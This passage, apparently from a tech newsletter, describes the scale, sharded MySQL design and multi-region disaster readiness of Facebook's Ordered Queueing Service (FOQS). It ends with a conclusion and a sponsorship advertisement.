FOQS is designed to handle massive workloads that would overwhelm traditional queueing systems.

See the diagram below that shows the distributed architecture for FOQS:

At Facebook, the service processes roughly one trillion items every day. This scale includes not only enqueuing and dequeuing tasks but also managing retries, delays, expirations, and acknowledgments across many regions.

Large distributed systems frequently experience temporary slowdowns or downstream outages. During these events, FOQS may accumulate backlogs of hundreds of billions of items. Instead of treating this as an exception, the system is built to function normally under backlog conditions. Its sharded MySQL storage, prefetching strategy, and routing logic ensure that tasks continue to flow without collapsing under the load.

A key aspect of this scalability is FOQS’s MySQL-centric design. Rather than relying on specialized storage systems, the Facebook engineering team optimized MySQL with careful indexing, in-memory ready queues, and checkpointed scans.

By combining sharding, batching, and resilient queue management, FOQS sustains enormous traffic volumes while maintaining reliability and predictable performance.

Conclusion

Facebook Ordered Queueing Service (FOQS) shows how a priority queue can support diverse workloads at a massive scale.

By building on sharded MySQL and combining techniques like buffering, prefetching, adaptive routing, and leases, FOQS achieves both high performance and operational resilience. Its pull-based model gives consumers control over their processing rates, while its abstractions of namespaces, topics, and items make it flexible enough to support many teams and use cases across the company.

A crucial part of FOQS’s reliability is its disaster readiness strategy. Each shard is replicated across multiple regions, and binlogs are stored both locally and asynchronously across regions. During maintenance or regional failures, Facebook can promote replicas and shift traffic to healthy regions with minimal disruption. This ensures the queue remains functional even when large parts of the infrastructure are affected.

Looking ahead, the Facebook engineering team continues to evolve FOQS to handle more complex failure modes and scaling challenges. Areas of active work include improving multi-region load balancing, refining discoverability as data spreads, and expanding workflow features such as timers and stricter ordering guarantees. These improvements aim to keep FOQS reliable as Facebook’s workloads continue to grow and diversify.

References:


SPONSOR US

Get your product in front of more than 1,000,000 tech professionals.

Our newsletter puts your products and services directly in front of an audience that matters - hundreds of thousands of engineering leaders and senior engineers - who have influence over significant tech decisions and big purchases.

Space Fills Up Fast - Reserve Today

Ad spots typically sell out about 4 weeks in advance. To ensure your ad reaches this influential audience, reserve your space now by emailing [email protected].